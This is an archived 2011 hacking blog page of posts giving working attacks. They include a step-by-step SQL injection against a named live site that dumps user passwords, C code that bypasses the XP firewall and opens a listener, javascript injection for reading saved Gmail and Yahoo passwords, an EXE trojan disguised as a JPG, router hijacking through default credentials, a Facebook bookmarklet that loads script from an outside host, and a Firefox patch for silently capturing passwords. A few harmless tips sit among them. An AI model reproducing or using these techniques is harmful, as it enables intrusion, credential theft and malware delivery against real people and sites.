Copy/paste disable

Friday, June 24, 2011

Get SQL injection Hacking tool for hacking websites and database

Safe3SI is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


how to hack websites using SQL injection, SQL Hack tool


Features

  • Full support for http, https website.
  • Full support for Basic, Digest, NTLM http authentications.
  • Full support for GET, Post, Cookie sql injection.
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
  • Powerful AI engine to automatic recognize injection type, database type, sql injection best way.
  • Support to enumerate databases, tables, columns and data.
  • Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
  • Support to ip domain query,web path guess,md5 crack etc.
  • Support for sql injection scan.


Download FROM HERE
Read More ->>

Ways To Enable Registry disabled by Administrator

Hello friends, today i will explain you the solution of very common problem that usually users face i.e whenever you try to open registry editor you get an error message "Registry has been disabled by Your Administrator". It's a very common problem and its solution is also quite simple if you know playing with registry. My main motive is not to provide or directly feed you the solution. I want that you should explore the things. So Let's explore the registry... 

Enable registry disabled by admiistrator or admin
Enable Registry Disabled by Administrator

 

What is Registry?
The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.
I know most of you know that registry is called the "BRAIN OF WINDOWS" which store all the information in form of registry keys or technically we call them DWORD or STRING or BINARY or MULTI-STRING values which stores the data into the data in the form the name suggests. 


How to enable the Registry disabled by Administrator?
The following message usually displayed when your system is infected by some virus that changes the registry value and hence you get an error message displaying " Registry is disable by Admin". So to fix it you also have to edit the registry but since your registry has been disabled so you cannot directly access it. For this you need to create one registry file that will update the dword value into the registry database.

Steps to enable registry:
1. Open the Notepad.
2. Copy the below code and paste into the notepad.

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

3. Now save the Notepad file as "anything.reg"(without quotes) and remember to select the file type as all files while saving otherwise you will not been able to execute it.

4. Now Close the file and open by double click on file and then click ok.




How to Do it using GPEDIT.MSC
Just follow this:
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled


That's all the simple hack to Enable the Registry disabled by Administrator. Isn't that simple...
Read More ->>

Tuesday, June 21, 2011

STEPS TO BYPASS WINDOWS FIREWALL

How to Bypass Windows XP Firewall using C program.
Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.

This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.




Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List


Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-


#include <*stdio.h*>
#include <*windows.h*>

#include <*ezsocket.h*>

#include <*conio.h*>

#include "Shlwapi.h"

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...
Read More ->>

Steps To Hack With Nmap And Metasploit.

Today I am writing a tutorial on hacking with Nmap with Metasploit.

First d/l Metasploit 3.3 from the official website,Link:

http://www.metasploit.com/

Let all that install, and towards the end of the installation it will ask if you would like Nmap installed also, choose yes. Once you have that installed the Metasploit screen will open up as shown below...

[Image: 1-2.jpg]

Now type db_create

Once you have typed that type nmap

This loads nmap, as shown below....

[Image: 11.gif]

You need to configure your scan now, I usually do a simple -sT -sV scan which will tell us the open ports and services running on the victims computer, Now type nmap -sT -sV xxx.xxx.xxx.x (X's being victims Ip number), Demonstrated below.

[Image: 11-1.gif]

Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...

[Image: 12.gif]

This is basically a list of the open ports and services running on the target machine, Now the handy feature of the metasploit 3.3 framework is the autopwn feature, this basically searches and runs all matching exploits in the Metasploit database against the target machine and if successful will create a shell or similar privilege for the attacker.

Now once you have the nmap results delivered back to you showing the open ports and services type db_autopwn -p -t -e , From this point you will either have access to the victims computer through a successfully launched exploit or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately on this particular machine I found it wasn't vulnerable as the image below proves.Good luck.

[Image: ff.gif]
Read More ->>

Free Working Youtube View Increaser

......................................................................................................
Youtube Increaser 2.0 [cracked]




This program will Ping your Youtube URL multiple times with a proxy list to increase youtube video views.


I used it and with a relatively small list I got to like.. 300 more views in an hour.










File Info

Report generated: 16.2.2009 at 5.43.08 (GMT 1)
Filename: Tube Increaser 2.0 Cracked.rar
File size: 1.68 mb
MD5 Hash: E47A5CD2A8FE42D7F0848D60ADA4B7D7
SHA1 Hash: DA1DBE94CCE884E4745DC5F319EDB270997C66E4
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Detection rate: 0 on 24


Detections


a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!


Scan report generated by
NoVirusThanks.org


Download link:
CLICK HERE
Read More ->>

Get Free E-book Of Windows XP Hacks Second Edition

Windows XP Hacks Download Second Edition


 Pages: 576 | Size: 13 MB

A smart collection of insider tips and tricks, Windows XP Hacks, Second Edition covers the XP operating system from start to finish. Among the multitude of topics addressed, this must-have resource includes extensive coverage of hot-button issues such as: security web browsing controlling the control panel removing uninstallable XP components pop-up ads You'll also find timesaving hacks for file distribution; digital media, such as iTunes; and high-visibility web software, services.
Download Windows Xp Hacks Second Edition Here.
Read More ->>

FIREFOX TRICK: ENABLE SAVE AND QUIT IN FIREFOX 4

Hey everyone i am back with another tutorial.So many of you might have updated to firefox 4 and when you close firefox you wont see save and quit.Now i will tell you how to get it back.

You will see this instead of Save and quit:
[Image: Save-on-Exit-Firefox-4.png]

1)Type in about:config in the address bar and hit enter.
[Image: aboutconfig-MozillaFirefox_2006-01-01_01-49-29.png]

2)Type browser.showQuitWarning in the Filter and click on toggle.
[Image: aboutconfig-3MozillaFirefox_2006-01-01_01-53-38.png]

3)When you toggle it will become true.
[Image: aboutconfig-MozillaFirefox_2006-01-01_01-54-41.png]

4)Save and quit is now enabled
[Image: QuitFirefox_2006-01-01_01-55-22.png]
Read More ->>

FORM EDITING USING JAVASCRIPT INJECTION

=========
Introduction
=========

Have you ever been to a school or a friends computer and seen saved passwords before loging into an account? Have you tried copying the bulleted password and pasted it on notepad hoping to see the plain-text password?

Perhaps you've been to websites where you can only enter a certain amount of characters to submit a web-form successfully. Have you tried to modify the HTML code offline and still have no luck in attaining the results you like?

If this sounds like you, keep reading!

This tutorial will describe how to manipulate HTML forms and edit your own values through Javascript Injection. Javascript Injection is when you insert your own Javascript Code to websites through the URL. These changes are only temporarily because Javascript is a client side language. This is, at times, necessary because some sites make sure you submit the form from the website like you were suppose to, therefore, offline source code editing will NOT work.

I'll start by discussing basics in form editing, then ill progress to talk about how to make really good use of JSi!


=========================
Javascript Injection! Form Editing
=========================

Before we begin, we need to understand that every form on a web page is contained in an Array called forms[x], unless specified otherwise. The variable x is the number of all forms in the page. Chronologically, the forms start from 0, therefore, the first form will be 0 and the second form will be 1 and it will continue in this fashion.

Take a look at this form snippet for example:


<html>
<body>
<form action="http://www.website.com/submit.php" method="post">
<input type="hidden" name="to" value="r00t@website.com">
</body>
</html>

Because this is the first form on the webpage, it will become forms[0] when we place it on the Javascript code. Most of us will try to download source code and edit the page offline, but if the submit.php script checks for the referrer, this will not be possible. Because of this, we need to edit the form through the URL!

You can use the following Javascript to check the Value a certain form element has. Since the value, according to the code snippet above, is r00t@website.com, that is whats going to be displayed:



jalert(document.forms[0].to.value);


When this is send through the address bar, r00t@website.com will pop up in an alert box as expected. The form[0] specifies that its the first form, and we wanted the value to be displayed.

Before i continue, I want to elaborate on something important. The Javascript Code that was inserted came directly from the HTML code that the form provided. For example, take a look at this code snippet:


<html>
<body>
<form action="http://www.website.com/submit.php" method="post">
<input type="hidden" name="email" value="r00t@website.com">
</body>
</html>

In the input tag, the name was changed from "to" to "email." This will affect the Javascript Code inserted! The code to inject will now look like:

jalert(document.forms[0].email.value);

As you can see, the Injected code varies on the form naming rules. Its laid out as document.forms[x].name.value in the input HTML tag.

Now lets resume where we left off. Now that you know we have to edit the form from the URL because the PHP script checks the referrer, we need to change the value "r00t@website.com" to our email address in order for whatever gets submitted be sent to us.

So how do we replace the current form email address with our? Easy, all you have to do is give the form a new value through this script:


jalert(document.forms[0].to.value="hacker@website.com");


This will change the email on the form to hacker@website.com. How do you know if you did it right? You can use the previous script to check your work!

If you type, assuming we used the first code snippet where the name was "to" in the input tag:


jalert(document.forms[0].to.value);


hacker@website.com will pop up in an alert box! This is an indication that we have correctly modified the value on the form, now all you have to do is submit the form!

===============================
Snooping Around Gmail and Yahoo Forms
===============================

Now that we know a little more about forms and how one can manipulate them using Javascript, lets get some saved username and passwords from Gmail and Yahoo Mail.

When people sign into Facebook, Gmail, or Yahoo, there is only one form, The form that handles username or emails and then the password for that account. Since we know there is one form that handles Authentication, we know that we will be using forms[0].

What we are essentially doing is finding the values for certain fields individually. We do not know the names of these fields but its self-explanatory to what they are. We can however find the field names. Another concept i want to talk about is elements!

A HTML element is an individual component of a form.

For example, if we know that in the first form there are fields for username and passwords that have saved credentials already, we need to know what element they are corresponding to that form. Yes! username and passwords elements will differ in their numbers because the location vary from form to form!

To make things easier, ill put it this way, just try to follow the thought process. Like I said an element is a single component, so lets say this HTML form have these elements laid out in this fashion:


1st element= IP address
2nd element= Referrer
3rd element= Last login
4th element= Username/email
5th element= Password


If this was the form of Gmail Account we obviously want the username and password so the elements we want is the 4th and 5th.

So how does the Javascript Injection look like?? Simply put, the first injection will look like:


jalert(document.forms[0].elements[4].value);

This will give you the username:

Then the second injection will look like:

jalert(document.forms[0].elements[5].value);

This will give you the password!


If we analyze the code, we want the 4th and 5th element from the first form. We need two separate injections because they are stored individually.

================
Real World Examples!
================

Enough with the technical stuff, these actual images will show you how to hack Gmail and Yahoo accounts that have saved passwords.

For Gmail, the Username element happened to be the 12th:


jalert(document.forms[0].elements[12].value);
[Image: gmail_user.jpg]



And the Password element happened to be the 13th:


jalert(document.forms[0].elements[13].value);
[Image: gmail_pass.jpg]


For Yahoo, the Username element happened to be the 24th:

jalert(document.forms[0].elements[24].value);
[Image: yahoo_user.jpg]


And the Password element happened to be the 25th:

jalert(document.forms[0].elements[25].value);
[Image: yahoo_pass.jpg]


==========
Final Words
==========

As you can see, form manipulation can be fun with a little knowledge on how forms work and how things are laid out. Moreover, you wont need software to help you unravel passwords in asterisks. This tutorial did not include everything about Javascript Injection. There are some things i did leave out because it wasn't entirely necessary to discuss, for example changing cookie values because that will segue into more of Cross Site Scripting.

Hopefully everyone enjoyed reading this
Read More ->>

Wednesday, June 15, 2011

Best way to hack a website

To help the n00bs
THE LINKS DONT WORK: Just copy paste them

For my purposes, i will use http://www.buysellusa.net as an example, this site is hackable.
if you try on this site, and it does NOT work, that means either i spelt the url wrong (silly me) or that the site has been fixed

Dont be to harsh on me for making it so nooby, i didnt get any of the articles explaining sql injections when i was first learning
if you get lost, keep reading, it might explain what you do not understand ahead.

Well, yeah, self explanitory. OK, here, in this article, i will teach you how to hack a website.
The method we are going to use is called mysql injection. Sql mean, "structured query language".
What this means, is that this programming language lets you send queries (a request for information and such) to a database and access hidden, or "confidential files" such as passwords, and usernames, if you catch my drift. A database is an orginized body of related data, or in simpler terms, like all the vital info stored on the website, and vital coding, or "scripting"(the programming) i think (im not very smart). Well, when making a mysql injection, you have to determine (find out) wether or not a site is vulnerable first (vulnerable, as in, you can make a proper mysql injection, or more simplified, if the web site can be hacked). To find out wether or not a site is vulnerable, you need to change the url. Simple isnt it. But, to get proper results, you need to find a url, that contains a VARIABLE <--------this is VERY important) An example of a url that contains a variable, is

http://buysellusa.net/classifieds/showCat.php?cat_id=10

The variable in this Url (website adress) is "cat_id=10"
A variable is a snipet of code or information that is assigned a value. like for example

tom=1

now, lets say this;

1+tom=2

do you understand?

it is a value pretty much. The value of this variable "cat_id=10" is 10.
Now, to determine wether or not you CAN hack this site. What you need to do, is make a change to the url, like i said before
now, this url, "http://buysellusa.net/classifieds/showCat.php?cat_id=10" must have something ADDED to it. At the end of the url,
add ' thats right, just add '
so the new url is:
http://buysellusa.net/classifieds/showCa...cat_id=10'
now if the site you want to hack is vulnerable, you should get and error message on the page. there are other ways to determine wether or not a site is vulnerable to mysql injections, dont get me wrong, but for my purposes, this is the way i will show you.

Now, on this particular url, when you add the magical character ' you should get an error message, something simaler to this:



Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 57
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_tree.php on line 424



Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 85
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND std_items.cat_id=std_categories.cat_id LIMIT
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_getResults.php on line 143

now remember, this is very vauge. It can be almost anything, as long as it mentions MySQL. If it mentions some random crap about vb its not vulnerable (AS FAR AS I KNOW)

now when you get that error your in buisness. This means your target site, or the site im using as an example, is vulnerable! HURRAY! now you can get to the hacking

ok next you need to find the number of columns. This i dont fully understand myself, like i said, i am an uber noob.
I THINK what the columns are, are the columns of data inside a chart. Like a chart stored within the database, that can hold like, usernames , or passwords. Anyhow you need to find out how many there are (how many columns for what chart? wtf im confused too, you just have to do it)

ok; to find the amount of charts, you have to use the statement in SQL which is" order by" , this tells the database how to order the results (im still confused, your not alone)

now, in the url, delete you magical character ' i know, it dosent deserve it, but do you want to hack or not? ok now the url is once again
http://buysellusa.net/classifieds/showCat.php?cat_id=10
Now, add the "Order by" command to the end
so the url should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by
now to find out the number of coloums, you would add a one to "Order by" so it would become "Order by 1"
now, the url is :
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1
but thats not all. You need to add some characters at the end, which tell the database that it is a query, and not you trying to connect to another page of the site. To do this, you use one of the following" -- " or " /* " these denote that the text is a comment. These are used in programming when you need to write yourself something to remember inside your code, or script.
it dosent matter what it is for, if you dont understand, you just need to know when to use it.

so add either -- or /* to the end of your url

(there are two different methods, because some servers block one of the methods, so if one of the comment symbols* -- * or * /* * dont work, try the other one. i personally prefer -- its faster

the url is now:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1--
OR
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*

make sure not to leave a space between your 1 and your -- or /*
now the first time, it is not going to work obviously.
To find out the number of columns, you need to increase the number "1" by 1 every time you try

so the first time you would make the url:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
second time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 2/*
third time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 3/*

and so on and so on, untill you encounter ANOTHER error. It should say something about mysql.
now you know the number of coloums. Lets say it took you 5 tires, on the fifth try, there was an error, then you have 4 columns, because the 5th try is an error, that means the column does not exist in this table (a table located inside the database)
now, you have the amount of columns, which is great.

Now we have to use the UNION function, which allows you to select more data within one sql statment. The statment in this case being what you add to the end of the url(hope your not lost)
Now when we use the union function, the syntax (how we use it, where we use it) is like so:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select
but we want it to look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2/*
what this does is select the columns in the table, column 1,2,3 and column 4
now of course, you only want to select the number of columns that you have determined exist. In my example, i determined 4.
Therefore, i selected column 1,2,3 and 4.
to tell if this command is working, look for numbers on the webpage, that werent there before. The numbers could be 1 or any number up to the amount of columns you found. So if there were 8 columns, the new number could be anywhere from 1-8.

Now you need to check for the mysql version. This is important, because if it is version 5, you job will be ALOT esier
now this part is sometimes tricky. Look to find the new number that appeared. Now, in your url
which should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union select all 1,2/*
you need to replace the number in the url that matches the number that appeared on the web page (so if the number that appeared is 2, then you replace the 2 in "union select all 1,2/*"

what you replace it with is:
@@version or version() if @@version yeilded no results.

we should get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,@@version/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
what we need is convert() function

i.e.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,convert(@@version using latin1)/*

(yeah, im confused too, dont worry, you might not have to use this)

or with hex() and unhex()

i.e.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,unhex(hex(@@version))/*

and you will get the MySQL version :D
The numbers telling you the version will appear on the web page, most lilkey where the other number appeared.

Now, one of the hardest parts, you need to find out the name of the table in which you wish to see the information of. Be it the table that stores passwords, or usernames, or both. you need to find out. This part can come down to guessing. But remember, always make an educated guess. Dont guess something random like spongepurple guess something like password or pswrd or user_name or user_names, you catch my drift? so in order to guess the name, use a syntax like this:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from randomguess/*
on this site, i know for a fact, that the user name table is
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from std_users/*

std means standard

now, you should get MORE numbers. But what do you do with them? you need to extract (put the data into a readable format)
the data. To do this, you need the column name. On this site, and on lots more sites, you can get a rough idea of what the column name is by reading the source of the webpage. The source, is the coding. you can read this by right clicking on the page and hit "Veiw Source Code". Now you need to find the register coding
to do this you might have to open up a new internet clien (have to internets running at once) or on firefox, another tab.
On your second internet, go to the "Creat account" page and veiw the source
on This website, http://www.buysellusa.com the code is as follows:

<INPUT TYPE="TEXT" NAME="new_user_name" value="" SIZE="15">
</td></tr>
<tr><td valign="top" align="right">
<FONT CLASS="small">
Password:
</FONT></td>
<td valign="top" align="right">
<INPUT TYPE="PASSWORD" NAME="password1" value="" SIZE="15">


here we can clearly see the words "new_user_name" and "password1"
from "new_user_name" im going to keep "User_name" because that seems logical

now to see if im right, i will need to check

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*

notice where i put "user_name" i put it inbetween the two columns, column 1 and column 2. Then i made sure to state WHERE i am selecting this data (from the column named "user_name") from, the std_users table. and VIOLA! you have every single account user name registered on the site. But now, we need the password.

now before, when we looked at the source code, we saw two interesting things, "New_user_name" and "password1"
now we need the "password1"
i will get rid of the one, because why would the column name have a 1 in it?
so basicially, you do the same thing that you did with the user names.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
but instead of that, its:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,password,2 from std_users/*
and ONCE AGAIN! VIOLA! you now have the password to each and every account on the site.

but the lesson is not over, now, to make it easier, we will reformat your results, so they can be better read.

to do this, simply use the contact function.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,concat(user_name,0x3a,password),2 from std_users/*

what this does, in a sense, is contact thoes columns from the chart you specify (in this case std_users) and displays there information, but, now, you can display them both at the same time, because they are being simotaneously contacted. And, in this context, it syncronizez the username to its password like so:

username:password

the 0x3a is just a hex code, it is equal to a colon, so your results will look nice.
and thats all.
If you have done this right, you should have just hacked a site.

for your first time, try on http://www.buysellusa.net its easy :P
on http://www.buysellusa.net, make sure to use /* comment symbol!
Read More ->>

Best Way to hide EXE Into JPG FILE

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your slave using this trick..?


1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.


2)
Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'


10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.


13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.


16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
Black Hat Victoire
Read More ->>

Get free account Of ADSL

Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.



First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.

Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:

[Image: pic1hr.png]


Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:

[Image: pic2q.png]

Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:

[Image: pic3hi.png]

And on the display tab choose "Hosts with open ports only":

[Image: pic4e.png]

Then click OK to save the preferences and click start:

[Image: pic5f.png]

After few seconds or minutes you should see your first IP addresses:

[Image: pic6c.png]

Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:

[Image: pic7kh.png]

Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:

[Image: pic8.png]

Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:

[Image: pic9v.png]

And password in this case is: 854179


Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial.


Don't forget to comment :))
Read More ->>

Make your friend mad using this cool Prank

Looking for a way to piss off your friends on Facebook? Here's how.

1. Go to the victims wall.

2. Copy and paste the code below into the browser on their wall.

3. Enter # of times and the message.

4. Refresh the page and laugh.


The code:

javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

Read More ->>

Tuesday, June 14, 2011

Easy way to make Firefox Always Remember Password without Prompt

This can be used if you want to steal a password from someone who uses your computer. Usually when someone enters a new password into a website Firefox will prompt the user and ask whether the password should be remembered or not, once modified it will always remember the password and no prompt will appear, leaving the user to assume that 'Remember passwords for sites' is disabled. When they have used your computer and finished, you can go to Preferences > Security > Saved Passwords > Show Passwords.

1) Close Firefox

2) Navigate to:
Win - C:/Program Files/Mozilla Firefox/Components
Mac - Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components

3) We are going to edit a file called nsLoginManagerPrompter.js, it is recommended you create a copy of it so you can replace the original file when you want to turn off this feature.

I recommend you download the following file and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one I have already edited and works, although I do understand that some may be weary of downloading files from a hack forum so I will explain how to edit the file for those who would prefer to do it themselves:
http://rapidshare.com/files/397687484/ns...er.js.html

4) Open the file in a text editor, you will see in the code 'comments', these are normal English notes in the code, that don't effect how the code works because there are stars on the left to tell the computer not to read it.

What you need to do is delete ALL the text in between the following two comments:
/*
* _showSaveLoginNotification
*
* Displays a notification bar (rather than a popup), to allow the user to
* save the specified login. This allows the user to see the results of
* their login, and only save a login which they know worked.
*
*/
 AND
/*
* _removeLoginNotifications
*
*/

You should be able to find these easily using the text editor's search function.

5) Once you have deleted the text you need to replace it with:

_showSaveLoginNotification : function (aNotifyBox, aLogin) {
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
},
6) Save the file, and restart firefox. It should now save all passwords without asking, and without prompting or notification. 
Read More ->>

Hack Any Computer Using IP Address.

Introduction
1.  Hello everyone and welcome to the basic NETBIOS document created by Bibek Shah. This document will teach you some simple things about NETBIOS, what it does, how to use it, how to hack with it, and some other simple DOS commands that will be useful to you in the future. THIS DOCUMENT IS FOR NEWBIEZ ONLY!!! If you are NOT a newbie then don't go any farther reading this because if you're smart enough you probably already know it all. So don't waste yourt time reading something that you already know.

1. Hardware and Firmware

1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC. It is responsible for starting up your computer, transferring control of the system to your operating system, and for handling other low-level functions, such as disk access.
